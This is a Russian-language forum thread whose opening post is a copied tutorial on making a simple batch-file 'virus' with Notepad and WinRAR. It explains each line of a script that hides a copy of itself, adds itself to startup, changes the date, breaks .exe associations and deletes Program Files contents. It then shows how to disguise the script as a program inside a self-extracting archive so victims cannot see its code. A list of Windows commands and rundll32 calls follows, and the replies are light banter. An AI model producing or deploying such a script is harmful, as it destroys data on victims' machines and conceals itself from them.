Создаём простой вирус
-
Cоздаём вирус с помощью блокнота и WinRar'а Сейчас я расскажу, как без знания программирования написать свой вирус с расширением ".bat". Статья предоставлена для начинающих. И вот еще что: статья написана в ознакомительных целях, и за использование нижеизложенной информации в целях нанесения вреда, мы не несём никакой ответственности!! При написания вируса я использовал обыкновенный блокнот. Итак начнем, каждую новую строчку я буду пояснять. @Echo off (запрещаем вывод на экран исполняемых команд) Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно) Date 13.09.96 (эта строка изменяет дату) If exist c:ski.bat goto abc (проверяет существует ли файл) Copy %0 c:ski.bat (копирует вирус только изменив названия) Attrib +h c:ski.bat ( делает файлу "ski.bat" скрытый атрибут) Echo c:ski.bat >>autoexec.bat (Прописывает файл "ski.bat" в автозагрузку) abc ( ……если он существует, то программа перейдет на метку :abc) Label E: TELEVIZOR (CD-ROM будет называться TELEVIZOR) assoc .exe=.mp3 (запускает все ".exe" файлы как музыка) del c:Program Files/q (удаляет все файлы из этой папки) Echo VIRUS LOAD (Выводит надпись) Итак мы написали простой вирус. Теперь нажимаем ФАЙЛ>>СОХРАНИТЬ КАК, и в поле "имя файла" пишем, например "virus.bat " ".bat" обязательна везде! Появился значок MS-DOS. Так что бы жертва не смогла увидеть его код, будем использовать WIinRar. Берем наш вирус и кидаем его в архив вылетит окно и ты просто ставишь галочку "создать SFX-архив". Далее заходим в дополнительное и открываем параметры SFX, там есть строка выполнить после распаковки. И ты пишешь РЕАЛЬНОЕ имя твоего вируса. Видишь, простой блокнот вступил, как "вирусосаздатель", а WinRar сделал якобы программу.... выводы делать тебе. И смотри непопадись сам на это. Не принимай файлы в интернете от незнакомых людей и смотри на размер файла.
-
reg - непосредственная работа с реестром. Смотреть reg /? всем! rcp - обмен файлами через rcp в ascii runas - от имени пользователя tasklist - отображает приложения и сеансы, связанные с ним. taskkill - позволяет завершить один или несколько процессов tftp - trivial ftp tskill - убить процесс reg - утилита взаимодействия с реестром bootcfg - настройка boot.ini append - позволяет открывать удаленные файлы так, словно они находятся в текущем. getmac - получить мас logoff - Заверщить пользовательский сеанс. mem - вывод на экран сведений о текущих процессах в ОЗУ mqbkup - архивирование netsh - ?? openfiles - просмотреть открытые файлы. rsh - выполнение команд на удаленных узлах с запущеной rsh sc - command line ?? rexec - выполнение команд на удаленных узлах с запущеной rexec shutdown - выключить (хе-хе) local or remote computer. systeminfo - вывод инфы о компе. schtasks - планировщик заданий. xcopy - копирование файлов и каталогов. tsshutdn - завершение работы сервера в установленом порядке. set - вывод, задание и удаление переменных среды cmd.exe. Свойства системы (пр.кн."мой комп") - дополнительно - Переменные среды. Там не все переменные, но много! Все смотреть просто set. Кстати, вот некоторые RunDLL команды, которые могут использоваться при создании батников rundll32 user,wnetdisсonnectdialog Окно "Отключение сетевого диска" Вызвать rundll32 user,disableoemlayer Сбой пpовоциpовать rundll32 user,repaintscreen Обновить (как ) rundll32 user,setcursorpos Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 Диалог "Установка Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL Окно "Откpыть с помощью..." вызвать*** rundll32 shell32,SHFormatDrive Окно "Фоpматиpование: Диск3,5(А)"
-
с какого то хакерского сооба копипастил и все на мое сообщество зайди там не капипаст кроме картинки :):
-
ANONYMOUS, Дай ссылку
-
zero,
в натуре копипаст ! -
zero, нах у OZZA спроси он там тоже админ
-
ANONYMOUS, а я че? Я ни чё))
-
zero, http://vk.com/xakepckaya_group
Добавлено через 00:33 мин.
Almir Bulatov, он вообще сказал сделай а не говори как делать и что будет с виндой -
ааа)) и без вас хакеров хватает,они вирус ещё создают :D: гады
-
Ребята вам что вирусов не хватает,скачайте кантру и радуйтесь,создавать нафига их итак много))) :):
-
:D: :D:
-
Kolia Sushkov, +